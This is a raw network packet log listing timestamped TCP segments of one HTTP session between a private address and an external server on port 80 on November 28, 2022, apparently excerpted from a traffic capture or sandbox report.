Nov 28, 2022 16:37:04.092530012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092560053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092585087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092608929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092619896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092631102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092641115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092650890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092659950 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092660904 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092859983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092917919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092931986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092942953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092953920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092963934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092974901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092986107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092997074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093008041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093079090 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.093194008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093224049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093230963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.093241930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093252897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093264103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093275070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093285084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093296051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093307018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093317986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093328953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093339920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093349934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093362093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093373060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093383074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093394041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093400002 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.093410015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093420982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093431950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093441963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.093601942 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.093741894 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.097560883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097767115 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.097832918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097846985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097871065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097884893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097896099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097907066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097935915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097946882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097959042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097982883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.097994089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098005056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098015070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098026037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098037004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098047972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098052025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098052025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098052025 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098068953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098079920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098090887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098103046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098114014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098124027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098134995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098272085 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098303080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098315001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.098474026 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098643064 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.098778009 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.101170063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101182938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101262093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101273060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101284027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101295948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101306915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101317883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.101486921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.101655960 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.102535963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102667093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102679968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102690935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102701902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102713108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102725983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102736950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102746964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102757931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102768898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102780104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102791071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102801085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102812052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102823019 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102833986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102844000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102854967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102865934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.102924109 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.102924109 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.103085041 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.103115082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.103127956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.103137970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.103220940 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.103391886 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.103391886 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.176299095 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185185909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185200930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185261965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185329914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185342073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185353041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185364008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185374975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185385942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185419083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185430050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185441017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185451984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185470104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185487032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185492992 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185519934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185535908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185547113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185558081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185568094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185579062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185590029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185600996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185611010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185625076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185651064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185662031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185662031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185662031 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185672045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185683966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185694933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185707092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185718060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185729027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185739994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185751915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185762882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185823917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185833931 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.185851097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185867071 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185879946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185892105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185904026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185916901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185929060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185941935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185954094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185966969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185978889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.185991049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186002016 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186011076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186032057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186217070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186219931 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186362982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186392069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186392069 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186409950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186423063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186435938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186449051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186460972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186472893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186485052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186496973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186510086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186522007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186533928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186546087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186558008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186562061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186583996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186604977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186630011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186644077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186656952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186669111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186681032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186693907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186706066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186717987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186729908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186743975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186755896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186768055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186779022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186779022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.186786890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186799049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186811924 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186825037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.186950922 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187063932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187119961 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187227964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187241077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187252998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187272072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187292099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187334061 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187339067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187351942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187381983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187393904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187405109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187417030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187427998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187439919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187484980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187495947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187508106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187510967 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187608004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187679052 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187679052 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187710047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187757969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187769890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187783003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187793970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187805891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187849045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.187865973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187876940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187889099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187903881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187922955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187943935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187963009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187977076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.187988997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188002110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188014030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188019037 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188019037 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188035011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188046932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188060045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188071966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188085079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188097000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188108921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188121080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188133955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188146114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188158035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188169956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188183069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188189983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188190937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188190937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188205957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188219070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188359022 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188528061 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188658953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188699007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188765049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188792944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188837051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188848972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188859940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188874006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188885927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188899040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188916922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188919067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.188934088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188954115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188976049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.188997030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.189088106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.189088106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.189088106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.189146996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.189157963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.189169884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.189258099 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.189426899 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.189598083 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.195971012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196054935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196106911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196120024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196134090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196146011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196157932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196213007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196224928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196237087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196249008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196260929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196271896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196284056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196295023 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.196295023 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.196316004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196329117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196340084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196369886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196382046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196393013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196403980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196417093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196434975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196461916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196465969 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.196490049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196510077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196530104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196549892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196568966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196588039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196624994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.196634054 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.196634054 CET	49830	80	192.168.11.20	104.21.2.6
